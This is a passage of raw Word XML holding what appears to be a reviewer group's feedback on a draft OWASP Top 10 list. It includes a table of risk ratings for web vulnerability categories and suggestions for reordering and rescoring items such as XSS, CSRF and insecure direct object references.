                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Prevalence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C2FFD">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Detectability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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62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17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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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1.67</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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Broken authentication and session management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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44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62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17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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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2.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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Cross Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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44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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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35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2.67</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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Insecure Direct Object Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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62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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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35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2.67</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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Cross Site Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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44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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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35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2.67</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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 xml:space="preserve">Security </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C2FFD">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Misconfiguration</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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62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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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35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2.67</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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Insecure cryptographic storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="135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3.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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Failure to restrict URL access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162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17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35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4.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009C2FFD">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unvalidated</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009C2FFD">
              <w:rPr>
                <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> redirects and forwards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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44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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="162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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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35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4.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidTr="009C2FFD">
        <w:trPr>
          <w:trHeight w:val="168"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1895"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Insufficient transport layer protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="144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62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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="117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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="dotted" w:sz="4" w:space="0" w:color="808080"/>
              <w:left w:val="dotted" w:sz="4" w:space="0" w:color="808080"/>
              <w:bottom w:val="dotted" w:sz="4" w:space="0" w:color="808080"/>
              <w:right w:val="dotted" w:sz="4" w:space="0" w:color="808080"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
            <w:pPr>
              <w:spacing w:after="0" w:line="168" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>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4.00</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Reorder the list according to the calculated ratings (preferred) or adjust the ratings to fit the "desired" list.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Business Risk</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The text in the Business risk box is sometimes the same (A2, A3, A6) which gives a copy-paste impression. Also, exposing or leaking data may not always have the same impact as manipulating or erasing data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: The document should try to say something </w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>specific</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> about the business risk of every item on the list.</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 2</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: The document should suggest that the reader considers data manipulation and deletion as well as exposure and leakage.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>List Items</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Here we give feedback on all the list items.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Injection</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We feel that the high prevalence of SQL injection is mostly true for legacy code, not newly developed code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Add a note on legacy code under Prevalence in the risk analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cross Site Scripting (XSS)</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XSS rarely leads to serious things in reality so maybe the Impact should be lowered? The serious XSS flaws are the stored ones but they are less prevalent. This means that XSS really is two different risks -- (1) reflected XSS = widespread but not so serious, (2) stored XSS = uncommon but rather serious.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Lower the Impact to Low (and recalculate the risk accordingly).</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 2</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Differentiate between reflected and stored XSS in the risk analysis (we're not sure how though :)</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 3</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: We feel that Insecure Direct Object Reference is a greater risk in reality and would like to swap it with XSS in the list (they have the same rating according to our calculation)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Broken Authentication and Session Management</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Although there is a clear connection between TLS and broken session management we feel that the TLS stuff belongs in the TLS section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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 1</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Remove TLS from Example Attack Scenarios.</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 2</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: List TLS last, not first under Am I Vulnerable?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Insecure Direct Object References</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This is a serious risk in reality, more serious than XSS. Therefore it deserves a higher rank on the Top 10 list. It has the same risk rating as XSS but we suggest it is placed as number three and XSS as number four.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Put Insecure Direct Object References as number three on the list and XSS as number four (they have the same rank).</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Minor remark</w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: The yellow box says Moderate but should say Impact Moderate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Cross Site Request Forgery (CSRF)</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 xml:space="preserve">CSRF often builds on social attacks such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phising</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and thus has not really become the security problem we anticipated. Therefore we feel that the Exploitability should be lowered or that the social factors should at least be commented as a non-trivial obstacle for the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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w:t>
      </w:r>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Lower the Exploitability to Difficult (and recalculate the risk accordingly) or add a comment on the problem of tricking the users to submit forged requests.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C2FFD" w:rsidRPr="009C2FFD" w:rsidRDefault="009C2FFD" w:rsidP="009C2FFD">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009C2FFD">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Times New Roman" w:hAnsi="Verdana" w:cs="Times New Roman"/>
          <w:b/>
